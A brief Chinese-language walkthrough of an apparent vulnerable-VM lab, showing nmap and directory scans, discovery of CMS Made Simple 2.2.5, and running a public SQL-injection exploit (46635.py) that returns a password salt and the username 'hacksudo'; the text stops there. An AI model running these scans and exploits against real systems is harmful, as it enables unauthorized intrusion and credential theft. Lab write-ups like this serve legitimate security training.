1.信息收集
- 存活主机扫描
- 端口扫描
- 目录扫描
nmap -A -T4 -p- 192.168.56.0/24
发现192.168.56.101开放21,22,80,443,3306端口
访问对应80端口
暂时没发现可用东西,接着目录扫描
didirb http://192.168.56.101/
gobuster dir -u http://192.168.56.101 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -b 400,403,404,500 -t 100 -x .php,.html,.txt,.bak,.zip
发现 /cms网页
发现/dict.txt字典
2.挖掘漏洞
访问/cms,发现是cms made simple 2.2.5版本,利用searchsploit 搜索历史漏洞
searchsploit cms made simple 2.2.5
发现sql注入可用,将其拷贝到桌面并修改其中的python2格式的print,修改完成后运行该文件
python3 46635.py -u http://192.168.56.101/cms
Salt for password found: 21ca796356464b52
Username found: hacksudo